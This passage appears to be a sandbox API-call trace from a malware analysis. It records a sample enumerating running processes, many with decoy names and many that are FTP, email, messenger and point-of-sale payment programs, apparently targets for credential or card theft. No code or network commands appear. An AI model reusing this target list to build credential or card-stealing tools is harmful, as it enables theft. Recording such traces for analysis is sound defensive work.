cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.406] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0160.417] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0160.420] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0160.422] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0160.425] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0160.427] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0160.429] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.431] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.434] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0160.436] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0160.438] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.440] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.443] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0160.445] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0160.447] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0160.450] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0160.452] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0160.457] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0160.460] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0160.462] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0160.464] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0160.467] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0160.470] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0160.472] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0160.474] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0160.477] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0160.479] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0160.481] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0160.483] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0160.485] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0160.488] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0160.490] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0160.495] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0160.497] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0160.500] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0160.503] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0160.505] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0160.508] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0160.510] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0160.513] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0160.516] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0160.519] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0160.522] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0160.524] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0160.527] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0160.529] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0160.534] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0160.537] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0160.540] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0160.543] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0160.546] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0160.548] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0160.550] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0160.553] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0160.555] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0160.558] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0160.560] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0160.563] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0160.565] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0160.568] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0160.570] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0160.574] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0160.575] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0160.577] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0160.579] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0160.580] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0160.582] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0160.584] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0160.585] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0160.587] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0160.589] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0160.590] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0160.592] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0160.594] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0160.596] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0160.597] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0160.599] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0160.600] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0160.602] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0160.604] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0160.606] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0160.608] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0160.610] CloseHandle (hObject=0x1ed4) returned 1 [0160.610] Sleep (dwMilliseconds=0x64) [0160.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b80 [0160.734] Process32First (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System 